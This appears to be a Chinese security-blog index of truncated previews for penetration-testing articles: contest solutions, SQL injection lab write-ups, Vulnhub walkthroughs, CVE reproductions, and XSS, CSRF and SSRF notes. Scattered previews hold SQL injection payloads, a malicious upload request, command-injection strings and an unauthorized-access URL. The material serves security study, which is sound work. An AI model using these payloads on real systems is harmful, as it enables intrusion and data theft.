渗透测试

2021山东省职业院校技能大赛“网络空间安全”赛题及赛题解析（超详细）

2021年中职组“网络空间安全”赛项 2021年中职组山东省竞赛任务书模块 A 基础设施设置与安全加固（200分）模块B 网络安全事件响应、数字取证调查和应用安全（400分）模块C CTF夺旗-攻击（200分）模块D CTF夺旗-防御（200分）不懂的可以私信博主！2021年中职组山东省竞赛任务书…

2020全国职业技能大赛嘉兴市“网络空间安全赛项”赛题及赛题解析（超详细）

2021年中职组“网络空间安全”赛项一.嘉兴市竞赛任务书二.任务书解析三.任务书答案四.不懂的可以私信博主！一.嘉兴市竞赛任务书一、竞赛时间 8：00—11：00 共计180分钟二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值第①阶段单兵模式系统渗透测试任务一： Ap…

sqlilabs—less5

文章目录Less51、爆库2、查表3、差列4、查数据Less5 单引号闭合 ?id1 and 12%23 ?id1 and 12%23 ?id1 order by 3%23 1、爆库联合查询后发现没有回显这里选择报错注入 ?id1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23 2、查表 ?id1 and up…

fofa title“和信下一代云桌面VENGD” 漏洞复现 POST /Upload/upload_file.php?ltest HTTP/1.1 Host: X.X.X.X Content-Type: multipart/form-data; boundary----WebKitFormBoundaryfcKRltGv------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name"f…

[ vulhub漏洞复现篇 ] Drupal＜7.32 Drupalgeddon SQL注入漏洞（CVE-2014-3704）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

F5 BIG-IP iControl RCE (CVE-2021-22986)

漏洞描述 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 1、CVE-2021-22986 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中，未经身份验证的攻击者可通过iControl REST接口，构造恶意…

网络渗透day03-Windows Server相关知识

1.在Windows Server中，以下哪个工具用于实时监视系统资源使用情况？ A.Event Viewer B.Task Manager C.Performance Monitor D.Resource Monitor 正确答案：D 答案解析：Resource Monitor用于实时监视系统资源使用情况。 2.在Wi…

渗透测试信息收集——企业基本信息

文章目录企业基本信息JS信息收集企业基本信息 1.企业基本信息。 2.员工信息（手机号码、邮箱、姓名等），组织框架、企业法人、企业综合信息等。 3.其中员工信息收集是信息收集中的一项重要工作，员工信息包括：员工姓名、…

网络安全与渗透测试工具导航

一些网络安全与渗透测试工具导航，值得收藏，看看有没有你熟悉的，也许有一天你会用得到！ 入门指南在线靶场文件上传漏洞靶场导航 payload 子域名枚举自动爬虫实现的子域名收集工具 waf开源及规则 web应用扫描工具 webshe…

关于Cobalt Strike

关于Cobalt Strike CobaltStrike关于Cobalt StrikeCobalt StrikeAPT攻击给TeamServer和Cobalt Strike赋予执行权限关于cobaltstrike文件夹启动teamserver和客户端Cobalt Strike模块Cobalt Strike 模块View 模块Attack 模块Packages 模块Web Drive-by 模块Reporting 模块利用Cob…

2021全国职业技能大赛郑州市“网络空间安全赛项”赛题及赛题解析（超详细）

2021年中职组“网络空间安全”赛项一.郑州市竞赛任务书二.任务书解析三.任务书答案四.不懂的可以私信博主！一.郑州市竞赛任务书一、竞赛时间 8：00—11：00 共计3小时二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值第①阶段：单兵模式系统渗透测试任务一： SS…

pikachu--xss

目录 XSS概述 XSS（窃取cookie）攻击流程 XSS漏洞常见类型 XSS漏洞测试流程 pikachu--反射型（get） pikachu--xss反射型（post） xss反射型（post）利用方式 picachu--存储型xss pi…

PIKACHU--CSRF

目录 CSRF概述如何判断网站是否具有CSRF漏洞实现csrf攻击需要的条件 CSRF和XSS的区别如何方式CSRF攻击 PIKACHU--CSRF(get) PIKACHU---CSRF(post) PIKACHU--CSRT TOKEN 防护措施 CSRF概述 CSRF(Cross-site request forgery,跨站情切伪造)由于在csrf的攻击场景中一…

PIKACHU--SQL注入

目录 SQL Inject（SQL）概述 SQL注入流程注入点探测信息获取获取权限注入点类型 PIKACHU--数字型注入（） PIKACHU--字符型注入（GET） PIKACHU--搜索行注入 PIKACHU--XX型注入 PIKACHU---insert/u…

越权访问

目录概念分类 pikachu--水平越权源码分析 pikachu---垂直越权源码分析概念越权访问（Broken Access Control,BAC）是web中一种常见的漏洞，且越权漏洞属于逻辑漏洞，是由于权限校验的逻辑不够严谨导致的，所以越…

sqli libs 6-10

第六关手工注入找到注入点 ?id1 正常 ?id1 正常 ?id1" 错误确定字段数量 ?id1" order by 3-- 正常 ?id1" order by 4-- 错误说明有3个字段，而且通过页面回显我们可以看出是和第五关是一样的&#xff0c…

vlunhub之icmp

信息搜集扫描网段扫描端口查看网站本来想着扫描一下网站目录看能不能找到点什么，结果也没什么收获发现漏洞根据网站搭建平台的一下信息，搜索到了可利用的脚本，那肯定是选远程命令执行啦监听端口利用脚本getshell 发现第一组flag c…

vulnhub之chili

信息搜集扫描网段扫描端口信息后续还扫了扫网站目录、奈何是一点信息都没有，随即在版本上下手，搜索一下看有无曾产生漏洞的版本虽然有，但无奈是个拒绝服务的漏洞，我可不想访问不了网站啊喂 ，只能放弃再换个思路 …

vulnhub之Monitoring（完整复现过程）

目录信息搜集扫描网段扫描端口扫描网站目录查看网页找到漏洞看到登录页面尝试爆破爆破出密码，尝试登录后台 getshell 后台行不通，还是回到搭建平台上找到一个版本对应的脚本 getshell失败，扩大搜索范围。尝试多个脚本找…

vulnhub 之ShellDredd-1-Hannah

目录信息搜集扫描网段扫描端口搜索中间件漏洞 ftp中间件 ssh中间件发现漏洞尝试登录ftp 查看文件 getshell id_rsa 下载id_rsa到本地登录ssh 找到普通用户下的flag 提权巧妙的方法常规方法尝试直接启动一个shell gcc编译.c文件在kali上起一个ht…

vulnhub：FOXHOLE: 1.0.1（复现）

这个靶机算是简单到中等难度的，然后虽然大了一点，但好在可以直接使用不用修改网络配置目录信息搜集扫描整个网段发现存活主机扫描IP地址发现开启端口及服务发现漏洞上百度查看该网站扫描网站目录紫色狐狸使用binwalk文件查看是否有隐…

vulnhub--lampiao（脏牛提权）

目录信息搜集扫描网段确具体IP地址扫描IP地址确定开放端口以及服务浏览器查看网站查看1898端口，发现另一个网站发现敏感信息扫描网站上百度发现漏洞使用msfconsole模块 getshell 尝试寻找flag信息提权尝试suid提权脏牛提权使用searchsploit工…

vulnhub之CengBox3

目录信息搜集扫描网段发现存活主机扫描IP地址发现开启端口及服务访问网站扫描网站修改host文件并访问该域名漏洞利用反弹shell 查看目标主机上是否有python环境使用python3语句反弹shell 在kali段监听端口执行反弹语句 getshell 寻找flag 提权介绍两个脚本…

vulnhub 之 vedas

目录信息搜集扫描网段确定真实IP地址扫描IP地址确定开放端口以及服务浏览器查看web网站扫描网站目录使用dirb扫扫描udp服务发现漏洞获取第一个flag 使用msf工具搜索snmp利用模块获取第二个flag 爬取网站信息作为扫描网站目录的字典扫描该网站目录访问扫描出…

vulnhub BIZARRE ADVENTURE: JOESTAR

JOJO 目录信息搜集扫描网段确定IP地址扫描IP地址确定开放端口以及服务 LLMNR scp-config 浏览器查看网站扫描网站目录漏洞利用发现服务提权总结参考文章信息搜集扫描网段确定IP地址扫描IP地址确定开放端口以及服务最后两个端口开放的服务没见过去百度…

vulnhub：inferno-1.1

目录信息搜集扫描网段确定真实IP地址扫描IP地址确定开放端口以及服务浏览器查看web站点扫描网站目录发现站点入口发现漏洞暴力破解登录页面登录后台 getshell 搜索管理平台名找到利用脚本最终确定49705.py为exp 提权发现隐藏文件 hex解密隐藏文…

win7环境搭建XSS测试平台

搭建xss平台 xss靶场介绍 XSS Platform 是一个非常经典的XSS渗透测试管理系统 XSS靶场相关资源 phpstudy https://www.xp.cn/ xssplatform https://github.com/78778443/xssplatform 搭建xss靶场下载好phpstudy后直接下一步即可完成安装将xssplatform下载好后解压后放到…

vulnhub靶场，DC-1

vulnhub靶场，DC-1 环境准备靶机下载地址：https://www.vulnhub.com/entry/dc-1,292/ 攻击机：kali（192.168.58.130） 靶机：DC-1（192.168.58.144） 下载好靶机之后直接使用VMware Work…

vulnhub靶场，DC-8

vulnhub靶场，DC-8 环境准备靶机下载地址：https://www.vulnhub.com/entry/dc-8,367/ 攻击机：kali（192.168.58.130） 靶机：DC-8（192.168.58.151） 下载好靶机之后直接使用VMware Work…

vulnhub靶场，Durian

vulnhub靶场，Durian 环境准备靶机下载地址：https://www.vulnhub.com/entry/durian-1,553/ 攻击机：kali（192.168.109.128） 靶机：Durian（192.168.109.140） 下载好靶机之后直接使用V…

vulnhub靶场，Fowsniff

vulnhub靶场，Fowsniff 环境准备靶机下载地址：https://www.vulnhub.com/entry/fowsniff-1,262/ 攻击机：kali（192.168.109.128） 靶机：Fowsniff（192.168.109.148） 下载好靶机之后直接…

vulnhub靶场，Node1

vulnhub靶场，Node1 环境准备靶机下载地址：https://www.vulnhub.com/entry/node-1,252/ 攻击机：kali（192.168.109.128） 靶机：Node1（192.168.109.166） 下载好靶机之后直接使用VMwar…

vulnhub靶场，HOGWARTS-BELLATRIX

vulnhub靶场，HOGWARTS-BELLATRIX 环境准备靶机下载地址：https://www.vulnhub.com/entry/hogwarts-bellatrix,609/ 攻击机：kali（192.168.109.128） 靶机：HOGWARTS-BELLATRIX（192.168.109.178&a…

windows渗透测试

假设您是一名网络安全工程师，需要对某公司的公司进行黑盒测试，分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试，并将该操作显示结果中8080端口对应…

vulnhub靶场，MASKCRAFTER-1.1

vulnhub靶场，MASKCRAFTER-1.1 环境准备靶机下载地址：https://www.vulnhub.com/entry/maskcrafter-11,445/ 攻击机：kali（192.168.109.128） 靶机：MASKCRAFTER-1.1（192.168.109.179）…

【CS学习笔记】7、SMBbean的作用

0x00 SMB Beacon 简介 SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信对同一台主机上的 Beacon 和跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。因为链接的Beacons使用Windows命名管道进行通信，此…

全网最全的安服工程师修炼手册

全网最全安服工程师修炼手册本篇文章主要介绍安全服务工程师的必备技能，也是简单记录下我的安服历程！ 思维导图附上点击下载基础技能网络 IP IP概念：IP地址被用来给Internet上的电脑一个编号。日常见到的情况是每台联网的PC上都需要…

【CS学习笔记】6、DNS_beacon的作用

由于笔者在学习CS过程中，所看的教程使用的是3.x版本的CS，而我使用的是4.0版本的CS。因此域名配置实操部分是自己参考网上大量文章后自己多次尝试后的结果，所以难免出现错误之处，要是表哥发现文中错误的地方，欢迎留言指…

vulnhub靶场，DC-7

vulnhub靶场，DC-7 环境准备靶机下载地址：https://www.vulnhub.com/entry/dc-7,356/ 攻击机：kali（192.168.58.130） 靶机：DC-7（192.168.58.150） 下载好靶机之后直接使用VMware Work…

IPC$入侵的4种方式

IPC$入侵的4种方式 1. 建立空连接 net use \\192.168.1.111\IPC$只要在建立空连接的命令最后添加del，即删除IPC$空连接的命令 2. 查看远程主机的当前时间 net time \\192.168.1.1113. 查看远程主机的共享资源 net view \\192.168.1.1114. 得到远程主机的NetBIO…

ARL灯塔安装与使用

ARL灯塔安装与使用 1. 系统要求2. ARL灯塔安装2.1. docker环境安装2.1.1. 更新yum包2.1.2. 卸载老版docker2.1.3. 安装docker所需要的依赖包2.1.4. 设置yum源2.1.5. 查看仓库中docker版本2.1.6. 安装docker最新版2.1.7. docker设置2.1.8. docker其它命令 2.2. 安装docker-compo…

代码审计步骤

代码审计步骤漏洞产生的原因 1、变量控制不严，一切输入都是有害的 2、变量到达有利用价值的函数（一切进入函数的变量都是有害的），漏洞的利用效果取决于最终函数的功能步骤 1、通读代码 2、利用工具查找漏洞关键字 3、审查追踪代码，确认漏洞 4、黑白灰盒测试工具 x…

JSONP 跨域访问(1), 简介, 原理, 实验, 缺点

JSONP 跨域访问(1), 简介, 原理, 实验, 缺点一, JSONP 简介 JSONP（JSON with Padding）是一种非官方跨域数据交互协议。它允许web页面从不同的域名下加载数据。由于同源策略，web页面通过XMLHttpRequest调用通常只允许访问与其自身相同域名…

BUUCTF Web题基本知识点和解题思路（1）

BUUCTF Web题基本知识点和解题思路（1） url里出现了类似于/?ip这样的参数，可以首先尝试命令注入，如?ip127.0.0.1, ?ip127.0.0.1;ls, ?ip127.0.0.1;cat flag.php，通过执行注入命令获取到flag的信息。注意&#xff1…

vulnhub靶场，vedas

vulnhub靶场，vedas 环境准备靶机下载地址：https://www.vulnhub.com/entry/ha-vedas,587/ 攻击机：kali（192.168.109.128） 靶机：vedas（192.168.109.173） 下载好靶机之后直接使用VMw…

vulnhub靶场，FIVE86-1

vulnhub靶场，FIVE86-1 环境准备靶机下载地址：https://www.vulnhub.com/entry/five86-1,417/ 攻击机：kali（192.168.109.128） 靶机：FIVE86-1（192.168.109.175） 下载好靶机之后直接使…

CORS 跨域访问, 实现跨域的原理, CORS漏洞利用

CORS跨域, 实现跨域的原理, CORS漏洞利用一, CORS跨域的原理 1. 跨域实验 202服务器: <?php $person array("name" > "John Doe","age" > 30,"occupation" > "Developer" );$jsonString json_encode($p…

JSONP 跨域访问(2), JSONP劫持

JSONP 跨域访问(2), JSONP劫持一, 利用 XSS 漏洞执行jsonp 1. 利用过程发现有jsonp的请求: <script type"text/javascript" src"http://192.168.112.200/security/jsonp.php?callbackjsonpCallback"></script>向xss漏洞的位置注入代码…

MySQL跨库注入

文章目录MySQL跨库注入1、查出该root账号下所有数据库2、获取指定数据库下表名的信息，以pikachu为例3、获取指定数据库下指定表名下的列名信息4、获取指定数据MySQL跨库注入需要高权限用户判断权限：连接数据库的用户名演示靶场——sqlilabs-less2 …

渗透测试之信息收集(一)

信息收集搞渗透的人应该都清楚，信息收集对于渗透测试来说是非常重要的，我们手上掌握的目标的信息越多，成功渗透的概率就越大，而信息收集又分为两类。第一类：主动信息收集：通过直接访问、扫描网站&#x…

渗透测试之信息收集(二)

一、google hack语法 googlehack 常用语法 site 指定域名 intext 正文中存在关键字的网页 intitle 标题中存在关键字的网页 info 一些基本信息 inurl URL存在关键字的网页 filetype 搜索指定文件类型 google语法利用实例 1、site:baidu.com #收集百度子域…

Vulnhub靶机Reconforce渗透

靶机介绍官方下载地址：http://www.vulnhub.com/entry/hacknos-reconforce-v11,416/ 这个靶机有两个flag，难度是中级运行环境靶机：网络设为桥接，IP地址:192.168.1.89 攻击机：同网段下的kali linux，IP地址…

vulnhub靶场，Monitoring

vulnhub靶场，Monitoring 环境准备靶机下载地址：https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机：kali（192.168.109.128） 靶机：Monitoring（192.168.109.139） 下载好靶机之…

MySQL—布尔盲注

文章目录Mysql盲注1、布尔盲注1.1、测试注入点1.2、order by1.3、爆回显1.4、判断数据库长度1.5、判断数据库名1.6、判断表名1.7、判断列1.8、查数据1.9、总结1.10、sqlilabs—8练习(1)、判断注入点(2)、爆字段(3)、判断数据库(4)、判断表(5)、判断列(6)、读取数据Mysql盲注 l…

sqlilabs—less2-4

Less2 测试后发现没有单引号闭合 http://127.0.0.1:82/Less-2/?id1 order by 3%23 1、联合查询看回显 http://127.0.0.1:82/Less-2/?id-1 union select 1,2,3%23 http://127.0.0.1:82/Less-2/?id-1 union select 1,database(),user()%23 2、查表 http://127.0.0.1:82…

渗透测试-获取系统FOFA关键字来刷洞

如何获取FOFA语法关键字有时候新爆出来的漏洞，想拿poc去刷一波，但是却不知道怎么用fofa去搜索 H3C为例存在漏洞的页面是这样的，我们发现无法右键查看源码（也可以F12）， 所以这个时候我们可以根据一些页面…

【漏洞复现】金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞附POC

漏洞描述金蝶云星空是一款云端企业资源管理（ERP）软件，为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云星空聚焦多组织，多利润中心的大中型企业，以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖：财务、供…

【漏洞复现】FLIR AX8红外线热成像仪命令执行漏洞

漏洞描述 eledyne FLIR 设计、开发、制造以及强大的传感和意识技术。自透射热图像、可见光图像、可见频率分析、来自测量和诊断的先进威胁测量系统以及日常生活的创新解决方案。 Teledyne FLIR 提供多种产品用于政府、国防、工业和商业市场。我们的产品，紧急救援人员，军事人…

PHP代码审计之基础方法思路流程

工具 Fotify|代码审计静态扫描工具，商业化静态代码扫描工具，误报率相对较低。 seay|源代码审计工具 PHPStorm|是PHP编程语言开发的集成环境。 chrome & burp & HackerBar 插件 & xdebug插件 Xcheck |Xcheck是一个由腾讯公司CSIG质量部代…

【漏洞复现】CVE-2023-36076：smanga漫画阅读系统远程命令执行漏洞复现附POC 附SQL注入和任意文件读取

漏洞描述无需配置，docker直装的漫画流媒体阅读工具。以emby plex为灵感，为解决漫画阅读需求而开发的漫画阅读器。在windows环境部署smanga安装环境面板，首先安装小皮面板，下载smanga项目，导入数据库，登录smanga，windows部署smanga。 /php/manga/delete.php接口处存在未…

对XSS攻击进行的一些总结

简介 XSS漏洞最早被发现是在1996年，由于JavaScript的出现，导致在Web应用程序中存在了一些安全问题。在1997年，高智文(Gareth Owen)也就是“XSS之父”，在他的博客中描述了一种称为“脚本注入”(script injection)的攻击技术&#x…

红队攻防实战之从边界突破到漫游内网(无cs和msf)

也许有一天我们再相逢，睁大眼睛看清楚，我才是英雄。本文首发于先知社区，原创作者即是本人本篇文章目录网络拓扑图： 本次红队攻防实战所需绘制的拓扑图如下： 边界突破访问网站： http://xxx.xxx.xxx…

细谈渗透测试的前期工作——信息收集

细谈渗透测试的前期工作——信息收集前言0x01 收集什么信息0x02 作用和收集方法总结前言都说学安全的，查资料找信息什么的都是基本功，收集信息的能力都是杠杠的，经常网上有什么热门的事情，小伙伴们都会来找我帮他们找点瓜吃&…

利用icmpsh建立icmp隧道反弹shell

首先在kali上安装icmpsh软件，软件地址https://github.com/inquisb/icmpsh.git 我们可以直接用git克隆过来git clone https://github.com/inquisb/icmpsh.git 然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问 pip2 install impacket 接…

App渗透 - 从SQL注入到人脸识别登录绕过

App渗透 - 人脸识别登录绕过打开APP是一个登录框抓包后发现参数被加密了使用Jadx脱源码发现，并没有加壳也没有混淆，运气很好根据经验，先搜索Encrypt、Decrypt等关键字，发现在Common.js中有一个encryptData函数定位过去&…

AVWS+Xray联动（详细版）

正文 awvs的爬虫很厉害，xray的扫描能力更强，而且xray的社区版不能爆破子域名。awvsxray联动就互相取长补短了。首先安装AWVS（这里用的是AWVS13破解版，软件在文末），具体破解版安装，压缩包里面有…

vulnhub靶机 | DriftingBlues:7 write-up

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag，搭建好环境如图。首先用nmap扫描一下ip地址 nmap -sP 192.168.110.1/24 #扫描网段中存活主机 nmap -p- 192.168.110.167 #在看看上面运行的服务 nmap -sV 192.16…

vulnhub靶机 | DriftingBlues:6 write-up

靶机下载地址：https://www.vulnhub.com/entry/driftingblues-6,672/ nmap -sP 192.168.110.1/24 #首先扫描存活网段扫描出靶机地址是192.168.110.169。在对其详细服务进行扫描。 nmap -sV 192.168.110.169 开着一个80端口，进行访问。发现只有一张图…

vulnhub靶机 | DC-1 write-up

靶机下载地址：https://www.vulnhub.com/entry/dc-1,292/ 搭建好环境，我们用nmap来扫描靶机的ip地址 nmap -sP 192.168.110.1/24 扫描到靶机的ip地址为192.168.110.174，那接下来我们来进行扫描一下端口 nmap -sV 192.168.110.174 发现开放一些…

【漏洞复现】IP-guard WebServer 远程命令执行

漏洞描述 IP-guard是一款终端安全管理软件，旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。互联网上披露IP-guard WebServer远程命令执行漏洞情报。攻击者可利用该漏洞执行任意命令，获取服务器控制权限。免责声明技术文章仅供参考，任何个人和…

黑客一般是如何入侵电脑的？

1.无论什么站，无论什么语言，我要渗透，第一件事就是扫目录，最好一下扫出个上传点，直接上传 shell ，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容…

DVWA-master新手指南之Brute Force（一）

一、写在前面 DVWA环境在计算机里搭设也将近有半个月了，也就只用过burpsuite来进行爆破方面的练习，今天重新玩了一下，其乐无穷，便有了分享思路的想法本系列教程不包含相关的环境搭设，这方面的教程网上很丰富&#x…

应急响应—溯源反制

应急响应—溯源反制 1. 攻击后溯源1.1. IP地址1.1.1. IP地址定位1.1.2. IP地址分析 1.2. 域名1.3. 手机号/QQ1.4. ID1.5. 木马样本1.6. 总结 2. 攻击中反制2.1. 定位准确2.2. 反制手段2.2.1. 钓鱼邮件反制2.2.2. 蚁剑反制2.2.2.1. 测试XSS漏洞2.2.2.2. RCE漏洞反弹shell 2.2.3.…

burpsuite抓包数据分析

以抓到的pikachu的数据为例： POST /pikachu/vul/burteforce/bf_form.php HTTP/1.1 # POST请求被抓包的文件 http协议是1.1 Host: www.xxx.com #Host是主机 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101Firefox/49.0 #user-agent是…

【漏洞复现】金和OA C6任意文件读取漏洞

漏洞描述金和OA协同办公管理系统C6软件共有20多个应用模块，160多个应用子模块，涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围，从功能型的协同办公平台上升到管理型协同…

VULNHUB之BBS (cute): 1.0.1

好久没写文章了，开始是学期末比较忙，后来放假了说实话有点懈怠也比较迷茫。感觉自己要学的东西很多却又不知道该从哪里下手。写文章就暂时放下了，最近整理了一下自己，文章还是要写，仅作为自己慢慢成长路上的一个记录也…

WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)

WordPress < 4.6(PHPMailer)命令执行漏洞(CVE-2016-10033) 漏洞概述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload，即可进行远程命令…

BSPHP 未授权访问信息泄露

漏洞描述 BSPHP 存在未授权访问泄露用户 IP 和账户名信息漏洞复现访问url： 构造payload访问： /admin/index.php?madmin&clog&atable_json&jsonget&soso_ok1&tuser_login_log&page1&limit10&bsphptime16004073…

VulnHub靶机maskcrafter-1.1渗透

靶机介绍官方下载地址：http://www.vulnhub.com/entry/maskcrafter-11,445/ 这个靶机有两种办法获取用户，两种办法获取root，不需要暴力破解运行环境： 靶机：网络设为NAT模式，IP地址：192.168.17…

文件任意上传

文章目录任意上传0、基础文件上传文件上传条件1、webshell2、找上传点3、黑白名单4、大马小马一句话马5、靶场5.1、找上传点5.2、上传大马并连接5.3、使用一句话任意上传 0、基础文件上传 1.前段选择文件，提交文件 2.浏览器形成POST MultiPart报文发送到服务器 …

2021全国职业技能大赛浙江省嘉兴市“网络空间安全赛项”赛题及赛题解析（超详细）

2021年中职组浙江省嘉兴市“网络空间安全”赛项一.2021嘉兴市竞赛任务书二.2021嘉兴市任务书解析三.不懂的可以私信博主！一.2021嘉兴市竞赛任务书一、竞赛时间 9：00—12：00 共计3小时二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值第①阶段：单兵模式系统渗透…

一文教你如何防御数据库渗透入侵

前言前段时间博主在做学校内部项目的时候，项目需要暂时上线测试，没想到上线测试几天，MySQL 数据库数据就被恶意删除，但是当时我们没有太当回事，以为只是一次普通黑客攻击，恢复数据之后仍然可以正常使用。…

【漏洞复现】好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞附POC

漏洞描述 “好视通”是国内云视频会议知名品牌，拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 [5] ，专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。用全国产、高清流畅、安全稳定的云视频服务助力各行各业数字化转型。其视频…

报错注入和HTTP请求头注入

文章目录报错注入和http请求头1、注入流程2、其他语法2.1、增删查改2.2、报错注入pikachu——insertpikachu——updatepikachu——delete报错注入和http请求头当进行 SQL 注入时，有很多注入会出现无回显的情况，其中不回显的原因可能是 SQL 语句查询方式…

SQL注入之文件导入导出

一、前言继续深入学习SQL注入二、背景通过SQL注入，我们不仅可以获取数据库内容，还可以通过具有一定权限的数据库用户，对操作系统进行操作，本文讲的就是文件系统进行的操作。三、前置知识本部分参考lcamry先生的《SQL注入…

Vulnhub靶机SickOs1.1渗透

靶机介绍官方下载地址：https://www.vulnhub.com/entry/sickos-11,132/ 目标是获取root目录下的a0216ea4d51874464078c618298b1367.txt文件发布日期是2015年11月运行环境： 靶机：网络连接方式设为自动桥接，IP地址：19…

Vulnhub靶机 TOPHATSEC: FRESHLY writeup

靶机介绍官方下载地址：http://www.vulnhub.com/entry/tophatsec-freshly,118/ 这个靶机需要在virtualbox导入，在VMware一直是导入失败运行环境靶机：网络连接方式设为自动桥接，IP地址：192.168.1.87 攻击机&#…

Vulnhub靶机tomato渗透

靶机介绍官方下载地址：http://www.vulnhub.com/entry/tomato-1,557/ 该靶机目标是获取root目录下的flag，难度是中等到困难运行环境： 靶机：网络连接方式设为自动桥接，IP地址：192.168.1.86 攻击机&#xf…

渗透学习 Windows基础

那些看似不起波澜的日复一日，会在某天让你看到坚持的意义。小白入坑学废集1Web安全系统目录、服务、端口、注册表服务服务的作用常见的服务服务端口端口作用端口分类常见端口协议黑客通过端口可以干什么？注册表注册表的作用注册表的结构测试中常用的注…

vulnhub靶机Acid渗透

靶机介绍官方下载地址：http://www.vulnhub.com/entry/acid-server,125/ 这个靶机的目标是获取root目录的的flag， 运行环境靶机：网络连接方式设为NAT，IP地址：192.168.174.134 攻击机：同网段下的kali Linu…

Vulnhub靶机y0usef渗透

靶机介绍官方下载地址：https://www.vulnhub.com/entry/y0usef-1,624/ 这个靶机难度较低，建议使用VirtualBox运行运行环境靶机：网络设为桥接，IP地址：192.168.1.88 攻击机：同网段下的kali linux系统&…

微信小程序漏洞之accesskey泄露

更新时间：2023年09月08日09:42:52 1. Accesskey泄露漏洞这篇文章里面都是以我个人的视角来进行的，因为一些原因，中间删了一些东西，肯定有很多不正确的地方，希望大家能理解，也能指正其中的错误。在以前…

SSRF攻防

SSRF攻防 SSRF简介 ssrf原理 SSRF(sever-side request forgery：服务器端请求伪造)是一种有攻击者构造形成由服务器端发起请求的安全漏洞。一般情况下，SSRF是要目标网站的内部系统。（因为他是从内部系统访问的，所以可通过它攻击…

Sqlilabs Less1—Less5

文章目录Less11、联合查询看显示位2、查表3、查列4、查数据Less21、联合查询看回显2、查表3、查列4、查数据Less31、联合查询爆回显2、查表3、差列4、查数据Less41、联合查询2、查表3、差列4、查数据Less51、爆库2、查表3、差列4、查数据Less51、准备工作2、获取表名3、获取列名…

漏洞总结（代码审计）

代码审计漏洞总结 SQL注入漏洞原理：由于开发者在编写操作数据库代码时，直接将外部可控的参数拼接到SQL语句中，没有经过任何过滤就直接放入数据库引擎执行。 SQL注入直接面对数据库进行攻击，危害不言而喻权限较大的情况下直接写入webshell或者系统命令，控制服务器权限…

NIDS网络威胁检测系统-Golang

使用技术： Golang Gin框架前端三件套演示画面： 可以部署在linux和window上目前已在Kali2021和Window10上进行测试成功

Vulnhub靶机DC-3渗透

靶机介绍官方下载地址：https://www.vulnhub.com/entry/dc-32,312/ 靶机介绍，没有像DC-1和DC-2说是一共有几个flag 运行环境： 靶机：网络连接方式设为桥接，IP地址：192.168.1.73 攻击机：通网段下…

站点信息搜集

站点信息搜集 1. whatweb 工具 kali自带的工具, 命令: whatweb httpbin.org http://httpbin.org [200 OK] Country[UNITED STATES][US], Email[mekennethreitz.org], HTML5, HTTPServer[gunicorn/19.9.0], IP[54.161.141.91], JQuery, Script[text/javascript], Title[ht…

ToBeWritten之Android/物联网各层防御措施

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

网络安全好就业吗？会不会容易被淘汰？

网络安全发展前景好吗？好就业吗？会不会容易被淘汰？很多刚入门或者想入门的小伙伴都会有这样的疑问今天就在这里给大家介绍一下。我就在这个行业，目前湖南，薪资就没必要说了，高就对了。这个行业优势就是工…

【漏洞复现】万户协同办公平台未授权访问漏洞

漏洞描述万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能，它以工作流引擎为底层服务，以通讯沟通平台为交流手段，以门户自定义平台为信息推送显示平台，为用户提供集成的协同工作环境。该平台存…

Windows安全 Tips(2)

Windows安全 Tips(2) 1. 对磁盘进行定期检查磁盘属性–>工具–>检查： 2. 对系统进行实时监控性能监视器可靠性监视器 3. 使用BitLocker保护系统安全 gpedit.msc–>计算机配置–>管理模版–>Windows组件： 4. 利用系统自带的防火…

vulnhub 之driftingblues7_vh

目录信息搜集扫描网段扫描IP地址扫描网站目录查看网站发现漏洞 GETSHELL 总结信息搜集扫描网段发现网站真实IP 扫描IP地址发现开启的端口以及服务，以及中间件的一些版本信息（这可能会是我们后续渗透的突破点） 扫描网站目…

sql注入(8), 常见注入绕过技巧

注入绕过技巧一, 闭合与逻辑作用: 绕过后端对 or 或 and 的禁用绕过后端对空格的禁用例如: 用 ||, && 代替 or, and 用括号代替空格 payload: 1’ or ‘1’1 闭合: id‘1’ or ‘1’‘1’ payload: 1’ || ‘1’1 闭合: id‘1’ || ‘1’‘1’ where id<1…

sqlilabs—less7

